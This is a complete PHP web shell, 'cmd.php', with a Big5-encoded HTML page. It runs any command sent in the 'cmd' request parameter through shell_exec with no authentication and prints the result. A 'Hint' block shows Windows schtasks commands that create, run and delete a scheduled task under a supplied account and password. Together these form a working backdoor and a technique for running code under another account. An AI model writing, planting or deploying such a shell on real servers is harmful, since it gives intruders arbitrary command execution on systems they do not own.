<?php
//cmd.php
//BIG5
if(isset($_REQUEST['cmd'])){
$cmd=get_magic_quotes_gpc()?stripslashes($_REQUEST['cmd']):$_REQUEST['cmd'];
$result=shell_exec($cmd);
}
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
<title></title>
</head>
<body>
<b>Command:</b>
<dir>
<form action="" method="post">
<input name="cmd" type="text" value="<?php echo htmlspecialchars($cmd, ENT_QUOTES); ?>" />
<input type="submit" value="Enter" />
</form>
</dir>
<b>Result:</b>
<dir>
<pre><?php echo htmlspecialchars($result, ENT_QUOTES); ?></pre>
</dir>
<b>Hint:</b>
<dir>
schtasks /Create /RU "XP帳號" /RP "XP密碼" /SC ONSTART /TR "calc" /TN "temp"<br />
schtasks /Run /TN "temp"<br />
schtasks /Delete /TN "temp" /F<br />
</dir>
</body>
</html>